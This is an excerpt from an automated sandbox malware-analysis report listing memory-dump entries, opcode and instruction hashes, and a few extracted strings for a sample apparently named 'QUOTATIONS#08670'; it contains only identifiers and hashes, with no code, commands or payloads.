                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q
                                                          • API String ID: 0-238743419
                                                          • Opcode ID: c7757582216b29f550c18ef1a1066337a0493a66813b3a1f64a26cd9e499bb37
                                                          • Instruction ID: 662aaabfcfd55d2b3cf9bc73157e2ea28fc0abee03efd0c70cbb2cbf0bf7a1e4
                                                          • Opcode Fuzzy Hash: c7757582216b29f550c18ef1a1066337a0493a66813b3a1f64a26cd9e499bb37
                                                          • Instruction Fuzzy Hash: 7FF0E5B5B04A01CFEF744E45E9801A97365E744352F0412F2FD00D7151D739CD10CA90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \Odq
                                                          • API String ID: 0-4257893106
                                                          • Opcode ID: 6c01ceff4f7c0f0ce2070d4963524d7f9dc5922ef6a6efea509c385cc3a16b44
                                                          • Instruction ID: 2c6a702ebd6cbbb0fab4f9ec05ab33a7494f07ddf69780eb223ffebfce680dd5
                                                          • Opcode Fuzzy Hash: 6c01ceff4f7c0f0ce2070d4963524d7f9dc5922ef6a6efea509c385cc3a16b44
                                                          • Instruction Fuzzy Hash: 1DF0FE70E60119DFDB14DF94E859BAEBBB2FF48704F20412AE402A7294CBB45D42CBC0
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a3ee66156b76a8fe54ffec1ccc5e6519c7f42448473b28c5496ba5a6ec55c28
                                                          • Instruction ID: 037c3727d4da785339907bdf122f948b440f4dc8c9aba2df9a6278d07d81f9b7
                                                          • Opcode Fuzzy Hash: 8a3ee66156b76a8fe54ffec1ccc5e6519c7f42448473b28c5496ba5a6ec55c28
                                                          • Instruction Fuzzy Hash: 94D1B274B00205CFDB54DF68D580AADBBB2FB88314F1085A9E516EB355DB39EC46CB81
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c3dcc45c8793a947ef82e5b2a0fe0b546d15992999a4c15ae71dabebd2d62a2
                                                          • Instruction ID: 37a2a9d2f4f4dc819cbb833bdc8535f0f7de1c0fecb82c328dcb1c10c5fd325c
                                                          • Opcode Fuzzy Hash: 1c3dcc45c8793a947ef82e5b2a0fe0b546d15992999a4c15ae71dabebd2d62a2
                                                          • Instruction Fuzzy Hash: 8C619DB1F400214FDB549A6EC88066FBBDAEFE4224B25447AD80EDB364EA65DD0287C1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c3aa8a386f3c40ab3368dfbd3cb9a9bba0dbd9e164d88d73150568722c0c0770
                                                          • Instruction ID: a652496bebf584bf6f6e0cd358aea37907766ecbbad2913006d112ebb5d9e222
                                                          • Opcode Fuzzy Hash: c3aa8a386f3c40ab3368dfbd3cb9a9bba0dbd9e164d88d73150568722c0c0770
                                                          • Instruction Fuzzy Hash: 60812A70B0020A8FDB54DFA8D59079EB7F2EF89304F108569D50AEB395EB74DC468B91
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9edada9ff244dec00f407c0d94d7db75432a1e237cef87ea6701054a51dd6336
                                                          • Instruction ID: 8ada919aef89b8c1e74466b124d019a1f8ae18ccf03f94878176b3c93294badc
                                                          • Opcode Fuzzy Hash: 9edada9ff244dec00f407c0d94d7db75432a1e237cef87ea6701054a51dd6336
                                                          • Instruction Fuzzy Hash: 07915F74E1021A8FDF60DF68C880B9DB7B1FF89300F208599D549AB395DB70AA85CF91
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70adc5a9676c0679ad5a272773082ef395dee50da7ed8b778e1789a73044e120
                                                          • Instruction ID: 8500eb530bb9a71ed3397aaa2d005190eedaaf182eed0987627f8f7c31fa22a4
                                                          • Opcode Fuzzy Hash: 70adc5a9676c0679ad5a272773082ef395dee50da7ed8b778e1789a73044e120
                                                          • Instruction Fuzzy Hash: BF913C74E1021A8FDF60DF69C880B9DB7B1FF89300F208599D549AB295DB70AA85CF91
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 234bbdf4cf3fe9083182c9e9c1f52ad047427546df9bd10d4b9273babddb9ad6
                                                          • Instruction ID: 18475bf13cde6ce86158c1fa56e342725b88dcc78719d2f59e5ae20a38129ce0
                                                          • Opcode Fuzzy Hash: 234bbdf4cf3fe9083182c9e9c1f52ad047427546df9bd10d4b9273babddb9ad6
                                                          • Instruction Fuzzy Hash: 2D714BB0A002099FDB54DFA9D980AADBBF6FF84304F148469E005EB365DB34EC46CB51
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8863a0686ee628dae990a4daaf5b64d26e5c473f0ddefbde0101ec157593d5d
                                                          • Instruction ID: 0eabc9221001f654cd64e29480f457069fb5c570bd475e844b30aa09d31b9ac6
                                                          • Opcode Fuzzy Hash: e8863a0686ee628dae990a4daaf5b64d26e5c473f0ddefbde0101ec157593d5d
                                                          • Instruction Fuzzy Hash: AD713BB0A002099FDB54DFA9D980AADBBF6FF84304F248469E415EB365DB34EC46CB51
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 20dafdc13139804eca3a8bd54be4721d9bc6d986d9a218b36c509f2bdfcfaf2c
                                                          • Instruction ID: 8f74655aefc7d80e5b7bbd343a1c972bf587ab8e0972f84667dc3c39df8f4734
                                                          • Opcode Fuzzy Hash: 20dafdc13139804eca3a8bd54be4721d9bc6d986d9a218b36c509f2bdfcfaf2c
                                                          • Instruction Fuzzy Hash: 0961CDB1F10105DFEB64AF78E4442BDBBB6EB84315F2088BAE50AD7350DB359856CB81
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95c755d330abd1b9017739098ace5fe9c26b760e302929deb565062f84088162
                                                          • Instruction ID: 8d2ed3c4995e369703fbda0d16b7b26783df43a876c77b60607898e822d8f18f
                                                          • Opcode Fuzzy Hash: 95c755d330abd1b9017739098ace5fe9c26b760e302929deb565062f84088162
                                                          • Instruction Fuzzy Hash: DA5193B0F10205DBEF645AB8D95473F266AD789300F20597AF00AD77A9CA7CCC4583A2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f85ad438c927367fd916e9c47cefd211d905df72920c2af0c9320f1f41069260
                                                          • Instruction ID: 98daf753d2a149184e835d0d2b2c393f16f241204b91a4fdda0d0db672c277d7
                                                          • Opcode Fuzzy Hash: f85ad438c927367fd916e9c47cefd211d905df72920c2af0c9320f1f41069260
                                                          • Instruction Fuzzy Hash: 6C5191B0F10205DBEF645AB8D95473F266ED788310F20597AF00ADB7A8CA7DCC4583A2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 07bc2cc0aba4723cd267b959aa3990577ec3de7e8783e60909f82c77e979b5a6
                                                          • Instruction ID: 661dfaaed344f88a4d35ff0bb6bd92058e28f1d601254dd1672a170ebcdeaf34
                                                          • Opcode Fuzzy Hash: 07bc2cc0aba4723cd267b959aa3990577ec3de7e8783e60909f82c77e979b5a6
                                                          • Instruction Fuzzy Hash: 2D4171B2E006098FDB70CFA9D880AAFFBF2FB54314F10496AE256D7654D331E9558B90
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c9d8d829c7451e0e7364d07c8f4fafdbb552fd2febbefb14d5d81dcd96997300
                                                          • Instruction ID: 2bcb9c7a305627e93ba479365fdb9a3ef8b5632f7b3dc47fa35b89fa699058a6
                                                          • Opcode Fuzzy Hash: c9d8d829c7451e0e7364d07c8f4fafdbb552fd2febbefb14d5d81dcd96997300
                                                          • Instruction Fuzzy Hash: 3231F470E1030A9FCF25DF65D88069EBBB6FF85304F10A569E506EB254DBB0E946CB81
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 595e329fd5c00e1fd90d53daf2e80bfed48d157d9ac0ae041e6c10cf5e08a0cf
                                                          • Instruction ID: deeaa6fb86ed46a31b0e4890ffec6d0d0aee8782a6bce52664f26f6182bc591d
                                                          • Opcode Fuzzy Hash: 595e329fd5c00e1fd90d53daf2e80bfed48d157d9ac0ae041e6c10cf5e08a0cf
                                                          • Instruction Fuzzy Hash: DA31F070E00219CFDB15CFA4D8A469EBBB6FF89300F108469E946EB354DB30AE46CB51
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d49acd730f63b32bdfed97786093cf19b5711a3534ee1fe32d86bef9bc8225a2
                                                          • Instruction ID: 0119c64ac5eabcfc68d5dd7dc4d58f02316a6b5ec0f94c4eb807afefb0685663
                                                          • Opcode Fuzzy Hash: d49acd730f63b32bdfed97786093cf19b5711a3534ee1fe32d86bef9bc8225a2
                                                          • Instruction Fuzzy Hash: 9D31AC70E1021ADBDB59DFA4D85469EB7F6FF89300F108429EA06E7350DB71AE42CB91
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b2dbd199e43edd98e8df8f34798f55ec9fdd3f6d0af0d70470bd8d1a127f168c
                                                          • Instruction ID: 61e7c3e5ac9c15294aa95f4ef2410d2aeec7650160d95d55db3026e586bcba74
                                                          • Opcode Fuzzy Hash: b2dbd199e43edd98e8df8f34798f55ec9fdd3f6d0af0d70470bd8d1a127f168c
                                                          • Instruction Fuzzy Hash: 402189B5E00215DFDB50CFA8D880AAEBBF1EB88310F148069E945EB351E739DD428B90
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9761efc180d929fe1026f7cfae4bb1ab9e2944a79c0e7dabaceeec4e3f05aceb
                                                          • Instruction ID: 2964cd4d6d9b768a0853014cd4aecfcc85c1beaa2740e86dd0e77a05c88bc68e
                                                          • Opcode Fuzzy Hash: 9761efc180d929fe1026f7cfae4bb1ab9e2944a79c0e7dabaceeec4e3f05aceb
                                                          • Instruction Fuzzy Hash: 73217AB5E00215DFDB50CFA9D980AAEB7F1EB48710F108069E905EB351EB38DC418B91
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573214583.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_141d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6999327eed71464d7c23b09ca73d37e7bd099d84d3004acb7d466512f77b6f08
                                                          • Instruction ID: d064df7c00dd7b4314476c79c672bf8aa8da61b1a269137ecc8062422732c6fe
                                                          • Opcode Fuzzy Hash: 6999327eed71464d7c23b09ca73d37e7bd099d84d3004acb7d466512f77b6f08
                                                          • Instruction Fuzzy Hash: 4D2125F5904204DFCB15DF58D988B26BF65EB84318F20C56EE80A0B36AC336D447CA62
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573214583.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_141d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7566a223df939421ab0aeb2b0e3456ba8759638bfb3a56c375621466882a3ddb
                                                          • Instruction ID: d0891bdf1e518e4552b554a994b45abd45cdf0187fb39e26b1dec5c9ec4b3ef6
                                                          • Opcode Fuzzy Hash: 7566a223df939421ab0aeb2b0e3456ba8759638bfb3a56c375621466882a3ddb
                                                          • Instruction Fuzzy Hash: 9E2104B1A44204DFDB05DF58C9C8B26BF65FB84314F24C56EE8094B36AC33AD846C661
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a64be45e3884b5636a705d0d02922b6d602da97abeec04c0ebe50419ae6a4cc
                                                          • Instruction ID: 0abae5842890321b55a73b8c7af603d7a068afdffe0fad0e2ed8c7ef569a68d9
                                                          • Opcode Fuzzy Hash: 3a64be45e3884b5636a705d0d02922b6d602da97abeec04c0ebe50419ae6a4cc
                                                          • Instruction Fuzzy Hash: 0F21D274B101199FDF44DB69E95479DB7B6EB84310F208579D405EB385EB36AD018B80
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573214583.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_141d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8391b7df7fe21662f43eeaa25d7396422d372d272c560a63afbe20b2a59f1211
                                                          • Instruction ID: 4f1f83f6ee9156d7f3f97d90d1650db74e768bde0c8aace6be6f7bbc548f3971
                                                          • Opcode Fuzzy Hash: 8391b7df7fe21662f43eeaa25d7396422d372d272c560a63afbe20b2a59f1211
                                                          • Instruction Fuzzy Hash: D5216B755093C08FDB07CF64C994711BF71AB46214F29C5EBD8898F2A7C23A980ACB62
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 433a338f6f909ef224cdc681e460718957c607896c212d43a4aabf7fe00dc098
                                                          • Instruction ID: 5d31230013466be8342a3249b86e69db70b210b0393ed0735dd107e8d150d02b
                                                          • Opcode Fuzzy Hash: 433a338f6f909ef224cdc681e460718957c607896c212d43a4aabf7fe00dc098
                                                          • Instruction Fuzzy Hash: F611C431B001289FDB54DA78D8106AF73EAEBC8351F008979D50AE7341EF69DC068BD1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8600b8dcbc0d0a2d881d0f0b1ed540fb13af7a91e58d21e32747edb5d2f28750
                                                          • Instruction ID: 897462e0c7ef51838f5199e598e4811dbb64b24219f9f827a92469ae9ac80639
                                                          • Opcode Fuzzy Hash: 8600b8dcbc0d0a2d881d0f0b1ed540fb13af7a91e58d21e32747edb5d2f28750
                                                          • Instruction Fuzzy Hash: 5C014775B241520FDB61DABD981075AABDBCBDA720F1484BFE14AC7396EB24CC078391
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: da1b7eededb413130ecc9b33e6ad997693a576d34652757e8fb536f167f55dbc
                                                          • Instruction ID: 55bb33928e91004169abb52cc54be0309c77eec1d383d3ba67e2fe9183206297
                                                          • Opcode Fuzzy Hash: da1b7eededb413130ecc9b33e6ad997693a576d34652757e8fb536f167f55dbc
                                                          • Instruction Fuzzy Hash: 1F21C0B5D01219AFCB40DF9AD884ADEFBB8FB49310F10816AE518B7250C375A954CBA5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83aed5e2fb6abb69b77574836dfb87ae61582c141ee0f1f81d503a56b626c3b3
                                                          • Instruction ID: 8f89d4abbf9932104e676b1d8547fcc4a90c61eac707b67a8df62e0bf563fa6c
                                                          • Opcode Fuzzy Hash: 83aed5e2fb6abb69b77574836dfb87ae61582c141ee0f1f81d503a56b626c3b3
                                                          • Instruction Fuzzy Hash: 3021FFB5D01219AFCB40DF9AD884ADEFBF4FB48310F10816AEA18B7241D375A954CBE4
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a0ca1fc371f95ca874c6b3965d1f311f272708b752bd2aee5f1083da26a68467
                                                          • Instruction ID: 9aceab78aea2612b7265708c361ebeaddb10d2411d0510078e984de97fedbce9
                                                          • Opcode Fuzzy Hash: a0ca1fc371f95ca874c6b3965d1f311f272708b752bd2aee5f1083da26a68467
                                                          • Instruction Fuzzy Hash: 3E01B132F140159BDB989A78E8106EF73EADBC8711F00457AD506E7281EF659C068BE1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb49cb53002c9db607ad6aad9311b2ff302047c9520d43565eb963f6d5f471d6
                                                          • Instruction ID: 5974f9696d237a154bf6ad9f245bda942d8bfb0dc4b5b91f2bfb5e73125bb5ed
                                                          • Opcode Fuzzy Hash: eb49cb53002c9db607ad6aad9311b2ff302047c9520d43565eb963f6d5f471d6
                                                          • Instruction Fuzzy Hash: 4801F175B045520BDB61D6BCA860B6AB7CADB85710F10847AF10AC7384EB21DC024395
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573214583.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_141d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5867ea3066c8d66ae14a7e2e82bc980888112c1538e9e79c62cad117a2215a17
                                                          • Instruction ID: 4d72b79ca20a4c32123b83eee38ddb39485a551ce5280542749178e632420f22
                                                          • Opcode Fuzzy Hash: 5867ea3066c8d66ae14a7e2e82bc980888112c1538e9e79c62cad117a2215a17
                                                          • Instruction Fuzzy Hash: 86118EB5904284CFDB06CF54D5C8B16BF72FB44214F24C6AAD8494B766C33AD44ACB51
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b56714e9cd0c8b85b82bd781034aeee4b81f6cb81024c321090cd2fe7743c04
                                                          • Instruction ID: 4245a61a8c5f57c777117f9ddd7e3500428650d019149e6ed23707ebc6f6e57e
                                                          • Opcode Fuzzy Hash: 1b56714e9cd0c8b85b82bd781034aeee4b81f6cb81024c321090cd2fe7743c04
                                                          • Instruction Fuzzy Hash: 6001D170B201150BDB60EABDA41075FA3CBDBD8720F10C47AE10AC7384EA65DC024391
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: adb5bca53e32f0f3b28096aa02b561b948fa54315a4bdaf0499af575ffa37b03
                                                          • Instruction ID: d5aa77c919a2069a3560b7eb0bc27deab9492a02174b8e27bbf09fefd1b11d5b
                                                          • Opcode Fuzzy Hash: adb5bca53e32f0f3b28096aa02b561b948fa54315a4bdaf0499af575ffa37b03
                                                          • Instruction Fuzzy Hash: 03012674B102148FD7A1EB38E89071E77EAEB46710F108579F10ACB395EE29EC028791
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 592af0b12b9c6ecf74fa38cc35fed156059d92bc44d6450c5baf7c3b8695ce6e
                                                          • Instruction ID: 77721b72fc537ef8327c65389184f3f1f0806a2a1174b46628398d18b840a85a
                                                          • Opcode Fuzzy Hash: 592af0b12b9c6ecf74fa38cc35fed156059d92bc44d6450c5baf7c3b8695ce6e
                                                          • Instruction Fuzzy Hash: C9016D75B105150BDB659AADA450B2E63DAEBC9B20F10847AF50AC7344EB25DC034395
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a53f2567e0bb8a05f2f71e04ac4575d663b655e1e71deebcca1a5ae7a45e9a53
                                                          • Instruction ID: 450b41a015f0f942259ad49f52388d0cbc3d0c847487fedbcca782cb4ca3f132
                                                          • Opcode Fuzzy Hash: a53f2567e0bb8a05f2f71e04ac4575d663b655e1e71deebcca1a5ae7a45e9a53
                                                          • Instruction Fuzzy Hash: EE013174B105158FDB61EA79E49071E73DAE785714F108579E10ADB354EE25EC128780
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4c70dbf634c1e7a03bcbf1f68f13f7399cc3ff44a1ea44eeb284c9a2d3665c29
                                                          • Instruction ID: 555e1b4366b293035063e0a81d62ce463f6bfd5e3d0e0f1d9fa2d9bf1f94204a
                                                          • Opcode Fuzzy Hash: 4c70dbf634c1e7a03bcbf1f68f13f7399cc3ff44a1ea44eeb284c9a2d3665c29
                                                          • Instruction Fuzzy Hash: 7FF092B2E141889FDB51CF748A6439A7BB9EB16204F2554E7D448DF202E276CE06C741
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q
                                                          • API String ID: 0-698649689
                                                          • Opcode ID: bc626f5d4948c4bfa3b0cb2b8883f909f3f73cc36d662f0c948743789d1a8a8c
                                                          • Instruction ID: d2a721befce2e0974b09431d025e8bf60ea74a02d4bb77cec8e1d4960da1a8b1
